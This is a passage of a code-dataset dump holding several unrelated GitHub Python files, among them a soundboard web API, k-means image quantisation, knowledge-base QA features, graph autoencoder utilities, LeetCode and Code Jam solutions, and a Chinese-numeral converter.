JSONResponse({\"success\": True})\n\n\n@app.get(\"/api/stop_all\")\nasync def api_stop_all(request: Request, username: str = Depends(get_current_username)):\n \"\"\"\n Stops all playing sounds\n \"\"\"\n if mqtt_enabled():\n mqtt_api.mqtt.publish(\"simple_soundboard/stopped_all\")\n sound_engine.stop_all()\n return JSONResponse({\"success\": True})\n\n\n@app.get(\"/api/fadeout_music\")\nasync def api_fadeout_music(request: Request, username: str = Depends(get_current_username)):\n \"\"\"\n Fadeout Music\n \"\"\"\n sound_engine.fadeout_music()\n return JSONResponse({\"success\": True})\n\n\n@app.get(\"/api/pause_music\")\nasync def api_pause_music(request: Request, username: str = Depends(get_current_username)):\n \"\"\"\n Pause Music\n \"\"\"\n sound_engine.pause_music()\n return JSONResponse({\"success\": True})\n\n\n@app.get(\"/api/resume_music\")\nasync def api_resume_music(request: Request, username: str = Depends(get_current_username)):\n \"\"\"\n Resume (unpause) Music\n \"\"\"\n sound_engine.resume_music()\n return JSONResponse({\"success\": True})\n\n\n@app.post(\"/api/save_folder_info\")\nasync def api_save_folder_info(request: Request, username: str = Depends(get_current_username)):\n \"\"\"\n Save current folder Info\n \"\"\"\n\n info = await request.json()\n current_folder = info[\"current_folder\"]\n folder_info = FolderInfo(**info[\"folder_info\"])\n for i in range(len(folder_info.content)):\n folder_info.content[i] = FileInfo(**folder_info.content[i])\n\n save_folder_info(current_folder, folder_info)\n return JSONResponse({\"success\": True})\n\n\n@app.get(\"/{full_path:path}\", include_in_schema=False)\ndef root(request: Request, full_path: str, username: str = Depends(get_current_username)):\n index_file = pkg_resources.resource_string(__name__, \"./index.html\").decode(\"utf-8\", \"ignore\")\n return HTMLResponse(index_file)\n\n\ndef find_sound_by_topic(topic):\n \"\"\"\n Returns FileInfo from all folders that match a MQTT topic from the Web UI\n \"\"\"\n matchs = []\n all_info_files = glob(f\"{MEDIA_FOLDER}**/folder_info.json\", recursive=True)\n for info_file in all_info_files:\n info = get_folder_info(info_file.split(MEDIA_FOLDER, 1)[1].rsplit(\"folder_info.json\", 1)[0])\n for sound in info.content:\n if sound.mqtt_topic == topic:\n matchs.append(sound)\n\n return matchs\n\n\ndef on_message(client, userdata, message):\n if message.topic == \"simple_soundboard/stop_all\":\n sound_engine.stop_all()\n elif message.topic == \"simple_soundboard/stop_sounds\":\n sound_engine.stop_sounds()\n elif message.topic == \"simple_soundboard/fadeout\":\n sound_engine.fadeout_music()\n elif message.topic == \"simple_soundboard/pause_music\":\n sound_engine.pause_music()\n elif message.topic == \"simple_soundboard/resume_music\":\n sound_engine.resume_music()\n elif message.topic.startswith(\"simple_soundboard/play/\"):\n sounds = find_sound_by_topic(message.topic.split(\"simple_soundboard/play/\", 1)[1])\n for sound in sounds:\n api_play_sound(sound)\n\n\ndef start():\n sound_engine.init()\n mqtt_config = get_config()[\"mqtt\"]\n if mqtt_config[\"mqtt_api_enabled\"]:\n mqtt_api.start(\n mqtt_config[\"host\"],\n mqtt_config[\"port\"],\n mqtt_config[\"username\"],\n mqtt_config[\"password\"],\n on_message,\n )\n else:\n logger.info(\"MQTT API is disabled\")\n\n uvicorn.run(app, host=\"0.0.0.0\", port=get_config()[\"port\"])\n return sys.exit()\n\n\nif __name__ == \"__main__\":\n start()\n","repo_name":"martinrioux/simple_soundboard","sub_path":"src/simple_soundboard/web_ui.py","file_name":"web_ui.py","file_ext":"py","file_size_in_byte":11436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28664690286","text":"PROBLEM = 'B-large'\n\nfin = open(PROBLEM+'.in', 'r')\nfout = open(PROBLEM+'.out', 'w')\n\ndef read_ints():\n l = fin.readline().strip()\n return [int(x) for x in l.split()]\n\nT, = read_ints()\n\ndef min_flips(stack):\n stack += '+'\n n_changes = 0\n prev = stack[0]\n for p in stack[1:]:\n if p != prev:\n n_changes += 1\n prev = p\n return n_changes\n\nfor caseno in range(1, T+1):\n print('Case #{}'.format(caseno))\n stack = fin.readline().strip()\n print(stack)\n\n res = min_flips(stack)\n\n print('res =', res)\n fout.write('Case #{}: {}\\n'.format(caseno, res))\n print()\n","repo_name":"DaHuO/Supergraph","sub_path":"codes/CodeJamCrawler/16_0_2_neat/16_0_2_takluyver_B.py","file_name":"16_0_2_takluyver_B.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31722491300","text":"import time\r\nstart_time = time.time()\r\nprint(\"Process finished --- %s seconds ---\" % (time.time() - start_time))\r\n\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.image as mpimg\r\nfrom sklearn.cluster import KMeans\r\nimport numpy as np\r\nfrom PIL import Image\r\n\r\n# img=mpimg.imread('test_kmean.jfif')\r\nimg=mpimg.imread('nam1.jpg')\r\n\r\nHEIGHT = img.shape[0]\r\nWIDTH = img.shape[1]\r\ndim = img.shape[2]\r\nn_colors = 9\r\nimg = img.reshape(-1,dim)\r\n\r\nCOLORS = []\r\nkmeans = KMeans(n_clusters=n_colors, random_state=0).fit(img)\r\nlabels = kmeans.labels_\r\n# print(labels.index(1))\r\nfor i in range(n_colors):\r\n sum_r = 0\r\n sum_g = 0\r\n sum_b = 0\r\n sum_rgb = 0\r\n for j in range(len(labels)):\r\n if labels[j] == i:\r\n sum_rgb += 1\r\n sum_r += img[j][0]\r\n sum_g += img[j][1]\r\n sum_b += img[j][2]\r\n COLORS.append([round(sum_r/sum_rgb,2),round(sum_g/sum_rgb,2),round(sum_b/sum_rgb,2)])\r\n\r\nprint(COLORS)\r\nfor i in range(len(img)):\r\n img[i] = COLORS[labels[i]]\r\n\r\nimg = img.reshape(HEIGHT,WIDTH,dim)\r\nprint(img)\r\nprint(\"Process finished --- %s seconds ---\" % (time.time() - start_time))\r\n\r\n#command for print the picture with rgb value\r\nimgplot = plt.imshow(img)\r\nplt.show()\r\n\r\nim = Image.fromarray(img)\r\nim.save(\"picture_kmean_1.jpeg\")\r\n\r\n","repo_name":"nguyenducnam03/Kmean_resize_picture_P2","sub_path":"main_nam1.py","file_name":"main_nam1.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15557630324","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 27 20:52:18 2019\r\n\r\n@author: cmy\r\n\"\"\"\r\n\r\nimport thulac\r\nimport codecs as cs\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport gensim\r\nsegger = thulac.thulac(seg_only=True)\r\n\r\n#word embedding\r\nchinese_embedding = {}\r\nwith cs.open('../../token2vec/zhwiki_2017_03.sg_50d.word2vec','r','utf-8') as fp:\r\n lines = fp.read().split('\\n')[1:100000]\r\n for line in lines:\r\n line = line.strip()\r\n elements = line.split(' ')\r\n chinese_embedding[elements[0]] = []\r\n for num in elements[1:]:\r\n chinese_embedding[elements[0]].append(float(num))\r\n#model = gensim.models.KeyedVectors.load_word2vec_format('../../token2vec/zhwiki_2017_03.sg_50d.word2vec',binary = False)\r\n\r\n\r\ndef ComputeSimilar(p_tokens,q_tokens,wordvec):\r\n '''\r\n 输入两个词序列,计算最大余弦距离和最大点乘值\r\n input:\r\n p_tokens: python-list\r\n q_tokens: python-list\r\n '''\r\n def cosine_Matrix(A, B):\r\n AB = np.matmul(A,np.transpose(B))\r\n A_norm = np.sqrt(np.sum(np.multiply(A,A),axis=-1))\r\n B_norm = np.sqrt(np.sum(np.multiply(B,B),axis=-1))\r\n norm = np.matmul(np.expand_dims(A_norm,axis=1),np.transpose(np.expand_dims(B_norm,axis=1)))\r\n return np.divide(AB,norm)\r\n p_embeddings = []\r\n q_embeddings = []\r\n for p in p_tokens:\r\n try:\r\n p_embeddings.append(wordvec[p])\r\n except:\r\n pass\r\n for q in q_tokens:\r\n try:\r\n q_embeddings.append(wordvec[q])\r\n except:\r\n pass\r\n if len(p_embeddings) == 0 or len(q_embeddings) == 0:\r\n return 0.0\r\n #计算余弦距离\r\n matrix = cosine_Matrix(np.array(p_embeddings),np.array(q_embeddings))\r\n sim_cos= np.sum(np.max(matrix,axis=1))#cos相似度之和\r\n return sim_cos\r\n\r\n\r\ndef ComputeTupleFeatures(predicates,question):\r\n '''\r\n 为每个候选tuple和问题计算人工特征\r\n predicates:[r1name,r2name]或[r1name,r2name]\r\n question:str\r\n q_tokens:未加载词典的分词结果\r\n q_chars:分字结果\r\n '''\r\n p_tokens = []\r\n for p in predicates:\r\n p_tokens.extend(segger.cut(p))\r\n p_tokens = [token[0] for token in p_tokens]\r\n p_chars = [char for char in ''.join(predicates)]\r\n \r\n q_tokens = segger.cut(question)\r\n q_tokens = [token[0] for token in q_tokens]\r\n q_chars = [char for char in question]\r\n #计算谓词和问题的word overlap\r\n word_overlap = len(set(p_tokens).intersection(set(q_tokens)))\r\n #计算谓词和问题的char overlap\r\n char_overlap = len(set(p_chars).intersection(set(q_chars)))\r\n #向量序列相似度\r\n word_similar_cos= ComputeSimilar(p_tokens,q_tokens,chinese_embedding)\r\n char_similar_cos= ComputeSimilar(p_chars,q_chars,chinese_embedding)\r\n return [word_overlap,word_similar_cos,char_overlap,char_similar_cos]\r\n\r\ndef features_from_two_sequences(s1,s2):\r\n #overlap\r\n overlap = len(set(s1)&(set(s2)))\r\n #集合距离\r\n jaccard = len(set(s1)&(set(s2))) / len(set(s1)|(set(s2)))\r\n #词向量相似度\r\n #wordvecsim = model.similarity(''.join(s1),''.join(s2))\r\n return [overlap,jaccard]\r\n\r\ndef ComputeEntityFeatures(question,entity,relations):\r\n '''\r\n 抽取每个实体或属性值2hop内的所有关系,来跟问题计算各种相似度特征\r\n input:\r\n question: python-str\r\n entity: python-str \r\n relations: python-dic key:\r\n output:\r\n [word_overlap,char_overlap,word_embedding_similarity,char_overlap_ratio]\r\n '''\r\n #得到主语-谓词的tokens及chars\r\n p_tokens = []\r\n for p in relations:\r\n p_tokens.extend(segger.cut(p[1:-1]))\r\n p_tokens = [token[0] for token in p_tokens]\r\n p_chars = [char for char in ''.join(p_tokens)]\r\n \r\n q_tokens = segger.cut(question)\r\n q_tokens = [token[0] for token in q_tokens]\r\n q_chars = [char for char in question]\r\n \r\n e_tokens = segger.cut(entity[1:-1])\r\n e_tokens = [token[0] for token in e_tokens]\r\n e_chars = [char for char in entity[1:-1]]\r\n \r\n qe_feature = features_from_two_sequences(q_tokens,e_tokens) + features_from_two_sequences(q_chars,e_chars)\r\n qr_feature = features_from_two_sequences(q_tokens,p_tokens) + features_from_two_sequences(q_chars,p_chars)\r\n #实体名和问题的overlap除以实体名长度的比例\r\n return qe_feature+qr_feature\r\n\r\nif __name__ == '__main__':\r\n print (ComputeEntityFeatures('高谭市的守护者的中文名是什么?','<高谭市>',['<守护者>']))\r\n","repo_name":"duterscmy/ccks2019-ckbqa-4th-codes","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4567,"program_lang":"python","lang":"en","doc_type":"code","stars":468,"dataset":"github-code","pt":"75"} +{"seq_id":"25716826969","text":"import pickle as pkl\r\n\r\nimport networkx as nx\r\nimport numpy as np\r\nimport scipy.sparse as sp\r\nimport torch\r\nfrom sklearn.metrics import roc_auc_score, average_precision_score\r\nimport sys\r\nfrom torch.nn import functional as F\r\n\r\ndef load_data(dataset):\r\n # load the data: x, tx, allx, graph\r\n names = ['x', 'tx', 'allx', 'graph']\r\n objects = []\r\n for i in range(len(names)):\r\n '''\r\n fix Pickle incompatibility of numpy arrays between Python 2 and 3\r\n https://stackoverflow.com/questions/11305790/pickle-incompatibility-of-numpy-arrays-between-python-2-and-3\r\n '''\r\n with open(\"data/ind.{}.{}\".format(dataset, names[i]), 'rb') as rf:\r\n u = pkl._Unpickler(rf)\r\n u.encoding = 'latin1'\r\n cur_data = u.load()\r\n objects.append(cur_data)\r\n x, tx, allx, graph = tuple(objects)\r\n test_idx_reorder = parse_index_file(\r\n \"data/ind.{}.test.index\".format(dataset))\r\n test_idx_range = np.sort(test_idx_reorder)\r\n\r\n if dataset == 'citeseer':\r\n # Fix citeseer dataset (there are some isolated nodes in the graph)\r\n # Find isolated nodes, add them as zero-vecs into the right position\r\n test_idx_range_full = range(\r\n min(test_idx_reorder), max(test_idx_reorder) + 1)\r\n tx_extended = sp.lil_matrix((len(test_idx_range_full), x.shape[1]))\r\n tx_extended[test_idx_range - min(test_idx_range), :] = tx\r\n tx = tx_extended\r\n\r\n features = sp.vstack((allx, tx)).tolil()\r\n features[test_idx_reorder, :] = features[test_idx_range, :]\r\n features = torch.FloatTensor(np.array(features.todense()))\r\n adj = nx.adjacency_matrix(nx.from_dict_of_lists(graph))\r\n\r\n return adj, features\r\n\r\ndef load_label(dataset):\r\n names = ['ty', 'ally']\r\n objects = []\r\n for i in range(len(names)):\r\n with open(\"data/ind.{}.{}\".format(dataset, names[i]), 'rb') as f:\r\n if sys.version_info > (3, 0):\r\n objects.append(pkl.load(f, encoding='latin1'))\r\n else:\r\n objects.append(pkl.load(f))\r\n ty, ally = tuple(objects)\r\n test_idx_reorder = parse_index_file(\"data/ind.{}.test.index\".format(dataset))\r\n test_idx_range = np.sort(test_idx_reorder)\r\n\r\n if dataset == 'citeseer':\r\n test_idx_range_full = range(min(test_idx_reorder), max(test_idx_reorder)+1)\r\n ty_extended = np.zeros((len(test_idx_range_full), ty.shape[1]))\r\n ty_extended[test_idx_range-min(test_idx_range), :] = ty\r\n ty = ty_extended\r\n\r\n label = sp.vstack((ally, ty)).tolil()\r\n label[test_idx_reorder, :] = label[test_idx_range, :]\r\n label = np.argmax(label.toarray(), axis = 1)\r\n return label\r\n\r\ndef parse_index_file(filename):\r\n index = []\r\n for line in open(filename):\r\n index.append(int(line.strip()))\r\n return index\r\n\r\n\r\ndef sparse_to_tuple(sparse_mx):\r\n if not sp.isspmatrix_coo(sparse_mx):\r\n sparse_mx = sparse_mx.tocoo()\r\n coords = np.vstack((sparse_mx.row, sparse_mx.col)).transpose() # 坐标\r\n values = sparse_mx.data\r\n shape = sparse_mx.shape\r\n return coords, values, shape\r\n\r\n\r\ndef mask_test_edges(adj):\r\n # pos: 划分边(不包含i-i)\r\n # neg:\r\n # Function to build test set with 10% positive links\r\n # NOTE: Splits are randomized and results might slightly deviate from reported numbers in the paper.\r\n # TODO: Clean up.\r\n\r\n # Remove diagonal elements\r\n adj = adj - sp.dia_matrix((adj.diagonal()[np.newaxis, :], [0]), shape=adj.shape)\r\n adj.eliminate_zeros()\r\n # Check that diag is zero:\r\n assert np.diag(adj.todense()).sum() == 0\r\n\r\n # pos\r\n adj_triu = sp.triu(adj) # \r\n adj_tuple = sparse_to_tuple(adj_triu)\r\n edges = adj_tuple[0]\r\n edges_all = sparse_to_tuple(adj)[0]\r\n num_test = int(np.floor(edges.shape[0] / 10.))\r\n num_val = int(np.floor(edges.shape[0] / 20.))\r\n\r\n all_edge_idx = list(range(edges.shape[0]))\r\n np.random.shuffle(all_edge_idx)\r\n val_edge_idx = all_edge_idx[:num_val]\r\n test_edge_idx = all_edge_idx[num_val:(num_val + num_test)]\r\n test_edges = edges[test_edge_idx]\r\n val_edges = edges[val_edge_idx]\r\n train_edges = np.delete(edges, np.hstack([test_edge_idx, val_edge_idx]), axis=0)\r\n\r\n def ismember(a, b, tol=5):\r\n rows_close = np.all(np.round(a - b[:, None], tol) == 0, axis=-1) # \r\n return np.any(rows_close) #\r\n\r\n test_edges_false = []\r\n while len(test_edges_false) < len(test_edges):\r\n idx_i = np.random.randint(0, adj.shape[0])\r\n idx_j = np.random.randint(0, adj.shape[0])\r\n if idx_i == idx_j:\r\n continue\r\n if ismember([idx_i, idx_j], edges_all):\r\n continue\r\n if test_edges_false:\r\n if ismember([idx_j, idx_i], np.array(test_edges_false)):\r\n continue\r\n if ismember([idx_i, idx_j], np.array(test_edges_false)):\r\n continue\r\n test_edges_false.append([idx_i, idx_j])\r\n\r\n val_edges_false = []\r\n while len(val_edges_false) < len(val_edges):\r\n idx_i = np.random.randint(0, adj.shape[0])\r\n idx_j = np.random.randint(0, adj.shape[0])\r\n if idx_i == idx_j:\r\n continue\r\n if ismember([idx_i, idx_j], edges_all):\r\n continue\r\n if ismember([idx_i, idx_j], test_edges):\r\n continue\r\n if ismember([idx_j, idx_i], test_edges):\r\n continue\r\n if ismember([idx_i, idx_j], train_edges):\r\n continue\r\n if ismember([idx_j, idx_i], train_edges):\r\n continue\r\n if ismember([idx_i, idx_j], val_edges):\r\n continue\r\n if ismember([idx_j, idx_i], val_edges):\r\n continue\r\n if val_edges_false:\r\n if ismember([idx_j, idx_i], np.array(val_edges_false)):\r\n continue\r\n if ismember([idx_i, idx_j], np.array(val_edges_false)):\r\n continue\r\n val_edges_false.append([idx_i, idx_j])\r\n\r\n assert ~ismember(val_edges_false, train_edges)\r\n assert ~ismember(val_edges_false, val_edges)\r\n\r\n assert ~ismember(test_edges_false, edges_all)\r\n assert ~ismember(val_edges_false, edges_all)\r\n assert ~ismember(val_edges, train_edges)\r\n assert ~ismember(test_edges, train_edges)\r\n assert ~ismember(val_edges, test_edges)\r\n\r\n\r\n data = np.ones(train_edges.shape[0])\r\n\r\n # Re-build adj matrix\r\n adj_train = sp.csr_matrix((data, (train_edges[:, 0], train_edges[:, 1])), shape=adj.shape)\r\n adj_train = adj_train + adj_train.T #对称\r\n\r\n # NOTE: these edge lists only contain single direction of edge!\r\n return adj_train, train_edges, val_edges, val_edges_false, test_edges, test_edges_false\r\n\r\n\r\ndef preprocess_graph(adj):\r\n adj = sp.coo_matrix(adj)\r\n adj_ = adj + sp.eye(adj.shape[0])\r\n rowsum = np.array(adj_.sum(1))\r\n degree_mat_inv_sqrt = sp.diags(np.power(rowsum, -0.5).flatten())\r\n adj_normalized = adj_.dot(degree_mat_inv_sqrt).transpose().dot(degree_mat_inv_sqrt).tocoo()\r\n # return sparse_to_tuple(adj_normalized)\r\n return sparse_mx_to_torch_sparse_tensor(adj_normalized)\r\n\r\n\r\ndef sparse_mx_to_torch_sparse_tensor(sparse_mx):\r\n \"\"\"Convert a scipy sparse matrix to a torch sparse tensor.\"\"\"\r\n sparse_mx = sparse_mx.tocoo().astype(np.float32)\r\n indices = torch.from_numpy(\r\n np.vstack((sparse_mx.row, sparse_mx.col)).astype(np.int64))\r\n values = torch.from_numpy(sparse_mx.data)\r\n shape = torch.Size(sparse_mx.shape)\r\n return torch.sparse.FloatTensor(indices, values, shape)\r\n\r\n\r\ndef get_roc_score(emb, adj_orig, edges_pos, edges_neg):\r\n def sigmoid(x):\r\n return 1 / (1 + np.exp(-x))\r\n\r\n def sigmoid_ad(x):\r\n x_ravel = x.ravel() \r\n length = len(x_ravel)\r\n y = []\r\n for index in range(length):\r\n if x_ravel[index] >= 0:\r\n y.append(1.0 / (1 + np.exp(-x_ravel[index])))\r\n else:\r\n y.append(np.exp(x_ravel[index]) / (np.exp(x_ravel[index]) + 1))\r\n return np.array(y).reshape(x.shape)\r\n\r\n # Predict on test set of edges\r\n adj_rec = np.dot(emb, emb.T)\r\n preds = []\r\n pos = []\r\n for e in edges_pos:\r\n preds.append(sigmoid_ad(adj_rec[e[0], e[1]]))\r\n\r\n\r\n pos.append(adj_orig[e[0], e[1]])\r\n\r\n preds_neg = []\r\n neg = []\r\n for e in edges_neg:\r\n preds_neg.append(sigmoid_ad(adj_rec[e[0], e[1]]))\r\n\r\n \r\n neg.append(adj_orig[e[0], e[1]])\r\n\r\n preds_all = np.hstack([preds, preds_neg])\r\n labels_all = np.hstack([np.ones(len(preds)), np.zeros(len(preds_neg))])\r\n roc_score = roc_auc_score(labels_all, preds_all)\r\n ap_score = average_precision_score(labels_all, preds_all)\r\n\r\n return roc_score, ap_score\r\n\r\ndef gaussian_parameters(h, dim=-1):#输入h:64*32\r\n\t\"\"\"\r\n\tConverts generic real-valued representations into mean and variance\r\n\tparameters of a Gaussian distribution\r\n\r\n\tArgs:\r\n\t\th: tensor: (batch, ..., dim, ...): Arbitrary tensor\r\n\t\tdim: int: (): Dimension along which to split the tensor for mean and\r\n\t\t\tvariance\r\n\r\n\tReturns:z\r\n\t\tm: tensor: (batch, ..., dim / 2, ...): Mean\r\n\t\tv: tensor: (batch, ..., dim / 2, ...): Variance\r\n\t\"\"\"\r\n\tm, h = torch.split(h, h.size(dim) // 2, dim=dim)#h: 64*16 m:64*16\r\n\tv = F.softplus(h) + 1e-8\r\n\treturn m, v #m: 64*16 v: 64*16\r\n\r\ndef _h_A(A, m):\r\n\texpm_A = matrix_poly(A*A, m)\r\n\th_A = torch.trace(expm_A) - m\r\n\treturn h_A\r\n\r\ndef matrix_poly(matrix, d):\r\n x = torch.eye(d)+ torch.div(matrix, d)\r\n return torch.matrix_power(x, d)","repo_name":"7231/Concept-free-Causal-Disentangle","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19798999203","text":"\"\"\"\npaper: https://www.sciencedirect.com/science/article/pii/S0378779605002415\n\"\"\"\nimport numpy as np\nimport matplotlib.pylab as plt\n\nimport signalz\nimport padasip as pa\n\nnp.random.seed(101)\n\nN = 15000\nn = 20\nn_skip = 10000\ndummy = False\n\n# if dummy:\n# d = signalz.levy_flight(N, alpha=1.8, beta=0., sigma=1., position=0)\n# else:\n# filename = \"data/DAT_ASCII_EURUSD_M1_201809.csv\"\n# d = np.loadtxt(open(filename, \"rb\"), delimiter=\";\", skiprows=1, usecols=(1,))\n\n\nq = signalz.random_steps(500, steps_count=40, distribution=\"standard\", std=3, mean=0)\nN = len(q)\nd = q + signalz.gaussian_white_noise(N, offset=0, std=0.1)\n\n\n\nx = pa.input_from_history(d, n)[:-1]\nd = d[n:]\n\n\nfilters = [\n {\"filter\": pa.filters.FilterNLMS(n=n, mu=1., w=\"zeros\")},\n {\"filter\": pa.filters.FilterRLS(n=n, mu=0.95, w=\"random\")},\n {\"filter\": pa.filters.FilterLMS(n=n, mu=0.1, w=\"random\")},\n]\n\n\n# for f in filters:\n# y, e, w = f[\"filter\"].run(d, x)\n# elbnd = pa.detection.ELBND(w, e, function=\"max\")\n\n\ny, e, w = filters[1][\"filter\"].run(d, x)\nelbnd = pa.detection.ELBND(w, e, function=\"max\")\n\n\n\n\n\n\nplt.subplot(311)\nplt.plot(d[n_skip:])\nplt.plot(y[n_skip:])\nplt.plot(q[n_skip:], \"k\")\n\n\nplt.subplot(312)\nplt.plot(elbnd[n_skip:])\n\nplt.subplot(313)\nplt.plot(np.abs(np.diff(d)[n_skip:]))\n\nplt.show()\n\n","repo_name":"matousc89/qwersfr1as4","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14181125191","text":"'''\nHash Table\n\n执行用时:1248 ms, 在所有 Python3 提交中击败了53.29% 的用户\n内存消耗:15 MB, 在所有 Python3 提交中击败了75.82% 的用户\n通过测试用例:32 / 32\n'''\nclass Solution:\n def numberOfBoomerangs(self, points: List[List[int]]) -> int:\n ans = 0\n N = len(points)\n for i in range(N):\n # dist: (x1 - x2) ^ 2 + (y1 - y2) ^2\n dist2cnt = defaultdict(int)\n for j in range(N):\n if i == j:\n continue\n x1, y1 = points[i]\n x2, y2 = points[j]\n d = (x1 - x2) ** 2 + (y1 - y2) ** 2\n dist2cnt[d] += 1\n for d, c in dist2cnt.items():\n ans += c * (c - 1)\n\n return ans\n","repo_name":"lixiang2017/leetcode","sub_path":"leetcode-cn/0447.0_Number_of_Boomerangs.py","file_name":"0447.0_Number_of_Boomerangs.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14444021507","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom Classes.Photo import Photo\n\n\nclass Collection:\n \"\"\"\n Classe chargée de stocker des informations sur les collections d'images.\n \"\"\"\n\n def __init__(self, nb_points, nb_photos, nb_intervalles):\n \"\"\"\n :param nb_points: le nombre de points rapportés par la collection si on la complète\n :param nb_photos: le nombre de points d'intérêt à photograpier\n :param nb_intervalles: le nombre d'intervalles dans lesquels on peut photographier\n \"\"\"\n self.nb_points = nb_points\n self.nb_photos = nb_photos\n self.nb_intervalles = nb_intervalles\n self.liste_intervalles = [] # Liste des intervalles pour la collection\n self.liste_photos = [] # Liste d'instances de la classe Photo, qu'on initialise vide et remplit ensuite\n self.ratio_rentabilite = self.donner_ratio(nb_points, nb_photos) # Représente le poids de la collection\n self.complete = False # Booléen qui indique si la collection est complétée ou non\n\n def donner_ratio(self, nb_points, nb_photos):\n \"\"\"\n Méthode chargée de :\n Calculer le ratio de rentabilité.\n \"\"\"\n ratio = nb_points / nb_photos\n return ratio\n\n def ajouter_photo(self, photo):\n \"\"\"\n Méthode qui ajoute une instance de la classe Photo à la collection.\n :param photo:instance de la classe Photo\n \"\"\"\n self.liste_photos.append(photo)\n\n def ajouter_intervalle(self, intervalle):\n \"\"\"\n Méthode qui ajoute un intervalle à la collection.\n :param intervalle: liste de deux entiers\n \"\"\"\n self.liste_intervalles.append(intervalle)\n\n def update(self):\n \"\"\"\n Méthode qui met à jour la collection et indique en retour si elle est complète.\n :return: Un booléen qui indique si la collection est complète\n \"\"\"\n self.nb_photos -= 1\n if self.nb_photos == 0:\n self.complete = True\n return self.complete\n\n\"\"\"Tests divers.\"\"\"\nif __name__ == \"__main__\":\n nb_points = 192\n nb_photos = 1\n nb_intervalles = 1\n # Création d'une collection\n c1 = Collection(nb_points, nb_photos, nb_intervalles)\n\n # Test de la méthode ajouter_photo\n # 97797 -340859\n c1.ajouter_photo(Photo(97797, -340859, c1))\n\n # Test de la méthode ajouter_intervalle\n # 0 604799\n c1.ajouter_intervalle([0, 604799])\n\n # Test de la méthode donner_ratio\n ratio = c1.donner_ratio(nb_points, nb_photos)\n print(\"Ratio de rentabilité de la collection : \" + str(ratio))\n","repo_name":"SimylinK/-Google-Hash-Code-2016-","sub_path":"Classes/Collection.py","file_name":"Collection.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17206336704","text":"# 自定义报错\r\nclass CNnumError(Exception):\r\n pass\r\n\r\n# 万以内中文数字转阿拉伯数字\r\ndef num_count(ch_list):\r\n num = 0\r\n number_dict = {\r\n '零':0,\r\n '一':1,\r\n '壹':1,\r\n '二':2,\r\n '两':2,\r\n '贰':2,\r\n '三':3,\r\n '叁':3,\r\n '四':4,\r\n '肆':4,\r\n '五':5,\r\n '伍':5,\r\n '六':6,\r\n '陆':6,\r\n '七':7,\r\n '柒':7,\r\n '八':8,\r\n '捌':8,\r\n '九':9,\r\n '玖':9\r\n }\r\n places_dict = {\r\n '十':10,\r\n '拾':10,\r\n '百':100,\r\n '佰':100,\r\n '千':1000,\r\n '仟':1000\r\n }\r\n if ch_list:\r\n for i in range(len(ch_list)):\r\n if ch_list[i] in places_dict:\r\n num += number_dict[ch_list[i-1]] * places_dict[ch_list[i]]\r\n if ch_list[-1] in number_dict:\r\n num += number_dict[ch_list[-1]]\r\n return num\r\n else:\r\n return 0\r\n\r\n# 万以上亿以内中文数字转阿拉伯数字\r\ndef wannum_num(chnum):\r\n chnum_dict = {}\r\n\r\n if '万' in chnum:\r\n chnum_dict['Wan'] = list(chnum.split('万')[0])\r\n chnum_dict['Ge'] = list(chnum.split('万')[1])\r\n else:\r\n chnum_dict['Ge'] = list(chnum)\r\n\r\n Wan_num = 0\r\n Ge_num = 0\r\n for i,j in chnum_dict.items():\r\n if i == 'Wan':\r\n Wan_num = num_count(j) * 10000\r\n else:\r\n Ge_num = num_count(j)\r\n num = Wan_num + Ge_num\r\n return num\r\n\r\n# 最终版中文数字转阿拉伯数字\r\ndef CNnum_num(chnum):\r\n police = ['零','一','壹','二','贰','三','叁','四','肆','五','伍','六','陆','七','柒','八','捌','九','玖','十','拾','百','佰','千','仟']\r\n for i in chnum:\r\n if i not in police:\r\n raise CNnumError(f'{i}不是正确的中文数字')\r\n if '亿' in chnum:\r\n Yi_num = wannum_num(chnum.split('亿')[0]) * 100000000\r\n num = wannum_num(chnum.split('亿')[1]) + Yi_num\r\n else:\r\n num = wannum_num(chnum)\r\n return num\r\n\r\n# 将字符串反向分割成指定长度的字符串列表(反向re.findall(r'.{lenth}',string))(例:string长度为11,lenth为4,分割为长度分别为3、4、4的字符串并组成列表)\r\ndef split2(string,lenth):\r\n string2 = ''\r\n strlist = []\r\n for i in range(1,len(string)+1):\r\n if i % lenth != 0:\r\n string2 += string[-i]\r\n if i == len(string):\r\n strlist.append(string2)\r\n else:\r\n string2 += string[-i]\r\n strlist.append(string2)\r\n string2 = ''\r\n strlist.reverse()\r\n strlist2 = []\r\n for i in strlist:\r\n strlist2.append(i[::-1])\r\n return strlist2\r\n\r\n# 4位及以下阿拉伯数字(str格式)转中文数字\r\ndef num4_cnnum(num,CNnumtype): #CHnumtype=True时为大写中文数字,反之为小写\r\n if CNnumtype:\r\n j = 1\r\n else:\r\n j = 0\r\n number_dict_list = {\r\n '0':'零',\r\n '1':['一','壹'],\r\n '2':['二','贰'],\r\n '3':['三','叁'],\r\n '4':['四','肆'],\r\n '5':['五','伍'],\r\n '6':['六','陆'],\r\n '7':['七','柒'],\r\n '8':['八','捌'],\r\n '9':['九','玖']\r\n }\r\n places_dict_list = {\r\n -2:['十','拾'],\r\n -3:['百','佰'],\r\n -4:['千','仟'],\r\n }\r\n num_list = []\r\n a = 0\r\n for i in 